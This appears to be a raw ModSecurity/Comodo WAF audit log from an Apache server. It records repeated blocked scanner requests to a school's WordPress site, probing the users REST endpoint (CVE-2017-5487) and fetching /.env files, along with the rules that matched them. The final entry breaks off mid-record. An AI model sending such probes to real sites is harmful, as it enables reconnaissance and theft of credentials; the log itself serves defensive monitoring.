Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3250576c-Z-- --3e04c923-A-- [30/May/2025:21:49:46 +0700] aDnFisYFzUaFKnNpI2CGzQAAAQc 103.236.140.4 35646 103.236.140.4 8181 --3e04c923-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 80.249.138.16 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 80.249.138.16 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3e04c923-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e04c923-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748616586504720 2783 (- - -) Stopwatch2: 1748616586504720 2783; combined=1283, p1=445, p2=804, p3=0, p4=0, p5=33, sr=116, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e04c923-Z-- --9ab34f16-A-- [30/May/2025:22:15:25 +0700] aDnLjUCWxJfHX2QfsdUQgwAAAIc 103.236.140.4 50722 103.236.140.4 8181 --9ab34f16-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.216.85.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.216.85.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9ab34f16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ab34f16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748618125824681 2292 (- - -) Stopwatch2: 1748618125824681 2292; combined=1247, p1=389, p2=829, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ab34f16-Z-- --53744b48-A-- [30/May/2025:22:35:05 +0700] aDnQKQYacg5Rp_mEAa3K5QAAAFQ 103.236.140.4 49836 103.236.140.4 8181 --53744b48-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.23.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.23.164 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --53744b48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53744b48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748619305078835 3081 (- - -) Stopwatch2: 1748619305078835 3081; combined=1479, p1=494, p2=954, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53744b48-Z-- --992e362c-A-- [30/May/2025:22:38:12 +0700] aDnQ5ECWxJfHX2QfsdUXHQAAAIs 103.236.140.4 54046 103.236.140.4 8181 --992e362c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 Accept-Charset: utf-8 --992e362c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --992e362c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748619492230435 832 (- - -) Stopwatch2: 1748619492230435 832; combined=360, p1=318, p2=0, p3=0, p4=0, p5=42, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --992e362c-Z-- --819efe3d-A-- [30/May/2025:22:58:01 +0700] aDnViQYacg5Rp_mEAa3R8gAAAE8 103.236.140.4 51752 103.236.140.4 8181 --819efe3d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 70.39.75.145 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 70.39.75.145 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --819efe3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --819efe3d-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748620681759193 777 (- - -) Stopwatch2: 1748620681759193 777; combined=348, p1=305, p2=0, p3=0, p4=0, p5=42, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --819efe3d-Z-- --1c5ae943-A-- [30/May/2025:23:09:59 +0700] aDnYVwYacg5Rp_mEAa3VvwAAAFg 103.236.140.4 39846 103.236.140.4 8181 --1c5ae943-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.204.55.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.204.55.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1c5ae943-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c5ae943-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748621399941744 4223 (- - -) Stopwatch2: 1748621399941744 4223; combined=2201, p1=693, p2=1472, p3=0, p4=0, p5=36, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c5ae943-Z-- --2d4a0c70-A-- [30/May/2025:23:53:04 +0700] aDnicMYFzUaFKnNpI2Ct4QAAARQ 103.236.140.4 41522 103.236.140.4 8181 --2d4a0c70-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 206.81.12.187 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 206.81.12.187 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --2d4a0c70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d4a0c70-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748623984753362 800 (- - -) Stopwatch2: 1748623984753362 800; combined=299, p1=263, p2=0, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d4a0c70-Z-- --cc96316e-A-- [31/May/2025:00:00:50 +0700] aDnkQsYFzUaFKnNpI2CwxQAAAQM 103.236.140.4 52246 103.236.140.4 8181 --cc96316e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.30.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.30.1 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cc96316e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc96316e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748624450719205 3086 (- - -) Stopwatch2: 1748624450719205 3086; combined=1378, p1=460, p2=889, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc96316e-Z-- --c246757f-A-- [31/May/2025:00:23:05 +0700] aDnpeUCWxJfHX2QfsdUySgAAAIc 103.236.140.4 52098 103.236.140.4 8181 --c246757f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 15.235.140.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 15.235.140.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c246757f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c246757f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748625785880490 2774 (- - -) Stopwatch2: 1748625785880490 2774; combined=1364, p1=440, p2=897, p3=0, p4=0, p5=27, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c246757f-Z-- --cdac5269-A-- [31/May/2025:00:32:03 +0700] aDnrkwYacg5Rp_mEAa3rlgAAAFE 103.236.140.4 35186 103.236.140.4 8181 --cdac5269-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.3 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.3 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --cdac5269-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cdac5269-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748626323339312 806 (- - -) Stopwatch2: 1748626323339312 806; combined=323, p1=280, p2=0, p3=0, p4=0, p5=43, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cdac5269-Z-- --6446232a-A-- [31/May/2025:00:37:24 +0700] aDns1FIXp1x3knXz7CgX6AAAAAQ 103.236.140.4 41894 103.236.140.4 8181 --6446232a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.255.241.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.255.241.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6446232a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6446232a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748626644601858 3231 (- - -) Stopwatch2: 1748626644601858 3231; combined=1411, p1=479, p2=901, p3=0, p4=0, p5=30, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6446232a-Z-- --281fc077-A-- [31/May/2025:00:49:38 +0700] aDnvslIXp1x3knXz7CgccwAAAAY 103.236.140.4 57542 103.236.140.4 8181 --281fc077-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 195.116.155.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 195.116.155.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --281fc077-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --281fc077-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748627378126720 2321 (- - -) Stopwatch2: 1748627378126720 2321; combined=1285, p1=408, p2=844, p3=0, p4=0, p5=32, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --281fc077-Z-- --d10b322f-A-- [31/May/2025:01:10:27 +0700] aDn0k8YFzUaFKnNpI2DBqQAAAQ0 103.236.140.4 56648 103.236.140.4 8181 --d10b322f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 93.175.248.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.175.248.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d10b322f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d10b322f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748628627379244 2535 (- - -) Stopwatch2: 1748628627379244 2535; combined=1252, p1=435, p2=781, p3=0, p4=0, p5=36, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d10b322f-Z-- --330c1279-A-- [31/May/2025:01:24:06 +0700] aDn3xnC_Owo8zPtYGR2YKwAAANI 103.236.140.4 47048 103.236.140.4 8181 --330c1279-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.147.185.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.147.185.173 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --330c1279-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --330c1279-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748629446794780 3136 (- - -) Stopwatch2: 1748629446794780 3136; combined=1572, p1=566, p2=976, p3=0, p4=0, p5=30, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --330c1279-Z-- --72a3400d-A-- [31/May/2025:01:42:23 +0700] aDn8D0CWxJfHX2QfsdVJdgAAAIA 103.236.140.4 43838 103.236.140.4 8181 --72a3400d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.133.76.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.133.76.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --72a3400d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72a3400d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748630543111053 3213 (- - -) Stopwatch2: 1748630543111053 3213; combined=1877, p1=520, p2=1332, p3=0, p4=0, p5=25, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72a3400d-Z-- --55c6bf34-A-- [31/May/2025:02:15:00 +0700] aDoDtMYFzUaFKnNpI2DQEAAAAQk 103.236.140.4 32980 103.236.140.4 8181 --55c6bf34-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 165.227.173.41 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 165.227.173.41 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --55c6bf34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55c6bf34-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748632500663617 874 (- - -) Stopwatch2: 1748632500663617 874; combined=356, p1=315, p2=0, p3=0, p4=0, p5=40, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55c6bf34-Z-- --59bddf34-A-- [31/May/2025:02:18:18 +0700] aDoEegYacg5Rp_mEAa0HtgAAAEM 103.236.140.4 37490 103.236.140.4 8181 --59bddf34-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.38.243.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.38.243.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --59bddf34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59bddf34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748632698697139 3064 (- - -) Stopwatch2: 1748632698697139 3064; combined=1362, p1=423, p2=910, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59bddf34-Z-- --5fa56a13-A-- [31/May/2025:02:37:20 +0700] aDoI8HC_Owo8zPtYGR2pqgAAAMc 103.236.140.4 35670 103.236.140.4 8181 --5fa56a13-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 85.112.71.239 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 85.112.71.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5fa56a13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fa56a13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 